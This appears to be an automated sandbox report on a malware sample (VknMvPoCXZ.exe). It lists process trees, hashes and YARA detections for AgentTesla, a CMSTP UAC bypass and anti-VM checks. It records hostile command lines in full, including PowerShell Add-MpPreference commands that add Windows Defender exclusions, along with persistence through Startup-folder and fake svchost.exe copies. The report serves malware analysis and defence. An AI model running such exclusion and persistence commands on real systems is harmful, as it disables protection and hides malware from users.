                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: AdvancedRun.exe PID: 3336 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:38
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 3%, Metadefender, Browse
                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                  Reputation:moderate

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: AdvancedRun.exe PID: 5908 Parent PID: 3336

                                                                                                                  General

                                                                                                                  Start time:15:20:41
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe' /SpecialRun 4101d8 3336
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:91000 bytes
                                                                                                                  MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:moderate

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 5888 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:44
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 6048 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 4928 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:45
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 4736 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:46
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 2968 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 1100 Parent PID: 2968

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 2196 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:47
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 736 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 1496 Parent PID: 2196

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 5456 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:48
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 1036 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6164 Parent PID: 5456

                                                                                                                  General

                                                                                                                  Start time:15:20:49
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6276 Parent PID: 1036

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 6288 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:50
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: 481F404B.exe PID: 6392 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0xa50000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 44%, ReversingLabs

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6408 Parent PID: 6288

                                                                                                                  General

                                                                                                                  Start time:15:20:51
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 6748 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:56
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6796 Parent PID: 6748

                                                                                                                  General

                                                                                                                  Start time:15:20:58
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 6804 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:57
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VknMvPoCXZ.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: powershell.exe PID: 6828 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                                                                                                                  Imagebase:0x1070000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6840 Parent PID: 6804

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: 481F404B.exe PID: 6852 Parent PID: 3472

                                                                                                                  General

                                                                                                                  Start time:15:20:59
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe'
                                                                                                                  Imagebase:0x210000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: conhost.exe PID: 6984 Parent PID: 6828

                                                                                                                  General

                                                                                                                  Start time:15:21:02
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7ecfc0000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: aspnet_compiler.exe PID: 6872 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:21:10
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                  Imagebase:0xb50000
                                                                                                                  File size:55400 bytes
                                                                                                                  MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 6952 Parent PID: 556

                                                                                                                  General

                                                                                                                  Start time:15:21:10
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                  Imagebase:0x7ff797770000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: WerFault.exe PID: 2036 Parent PID: 6952

                                                                                                                  General

                                                                                                                  Start time:15:21:11
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                                                                                                                  Imagebase:0xf60000
                                                                                                                  File size:434592 bytes
                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 5532 Parent PID: 3472

                                                                                                                  General

                                                                                                                  Start time:15:21:13
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 44%, ReversingLabs

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: WerFault.exe PID: 3880 Parent PID: 2244

                                                                                                                  General

                                                                                                                  Start time:15:21:21
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 2328
                                                                                                                  Imagebase:0xf60000
                                                                                                                  File size:434592 bytes
                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                  Chronological Activities

                                                                                                                  Analysis Process: svchost.exe PID: 4496 Parent PID: 3472

                                                                                                                  General

                                                                                                                  Start time:15:21:23
                                                                                                                  Start date:15/09/2021
                                                                                                                  Path:C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe'
                                                                                                                  Imagebase:0x4d0000
                                                                                                                  File size:780216 bytes
                                                                                                                  MD5 hash:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, Author: Joe Security

                                                                                                                  Chronological Activities

                                                                                                                  Disassembly

                                                                                                                  Code Analysis

                                                                                                                  Reset < >

                                                                                                                    Analysis Process: VknMvPoCXZ.exe PID: 2244 Parent PID: 2856 VknMvPoCXZ.exeCOMMON

                                                                                                                    Executed Functions

                                                                                                                    Function 024C6AD8, Relevance: .1, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8251233f9241b3568890cd8121b998fb106135f63505479e7188d1a4dda2472d
                                                                                                                    • Instruction ID: 29064daa75479a506193b6e47eb2353afbe2bc372ac5293a67556e41b04508d4
                                                                                                                    • Opcode Fuzzy Hash: 8251233f9241b3568890cd8121b998fb106135f63505479e7188d1a4dda2472d
                                                                                                                    • Instruction Fuzzy Hash: 745147B49006499FEB14CFA9D548BDEBBF8FB88314F20845EE019A7361D7346845CF65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CBB08, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 7bd8e0860af5ca7860d271e75df6d5a4afab34983f01c6bea6231315c7234467
                                                                                                                    • Instruction ID: d6e8115933acf3119a1b146ab47bdd7a9a5567a3badbef1493c7cbe33f9e2964
                                                                                                                    • Opcode Fuzzy Hash: 7bd8e0860af5ca7860d271e75df6d5a4afab34983f01c6bea6231315c7234467
                                                                                                                    • Instruction Fuzzy Hash: 96713274A00B058FD764DF6AC05579BB7F5FF88208F10892ED04ADBB50EB34E84A8B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CB12C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 024CDCCA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.569780347.00000000024C0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 716092398-0
                                                                                                                    • Opcode ID: 8b9aa4d78c5d05b8fe086c59859cc34ea5a5372391d06946a970326f1993881a
                                                                                                                    • Instruction ID: 1e2efd3b19f5211b8238de803773908c6569f1fa121a2007a71c491b917849f5
                                                                                                                    • Opcode Fuzzy Hash: 8b9aa4d78c5d05b8fe086c59859cc34ea5a5372391d06946a970326f1993881a
                                                                                                                    • Instruction Fuzzy Hash: 2451AFB5D00309EFDF14CF99D984ADEBBB5BF48314F24852AE819AB210D774A985CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 024CB130, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
